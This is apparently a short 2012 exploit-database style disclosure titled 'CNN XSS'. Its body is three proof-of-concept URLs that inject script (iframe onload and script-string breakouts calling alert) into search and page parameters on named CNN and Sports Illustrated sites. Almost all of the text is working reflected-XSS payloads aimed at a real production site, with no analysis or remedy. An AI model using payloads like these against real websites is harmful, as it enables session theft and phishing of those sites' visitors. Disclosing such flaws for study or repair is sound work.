# Exploit Title: CNN XSS
# Date: 14.09.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: html-asp
------------------------------------------------------------------
http://edition.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E

http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FTayfunBasoglu%2F%29%3E

http://sports.sportsillustrated.cnn.com/racingfront.asp?series=%27%29;%20alert%28%22TayfunBasoglu%22%29;//%3C/script%3E
------------------------------------------------------------------

tayfunbasoglu.blogspot.com
twitter.com/tayfunbasoglu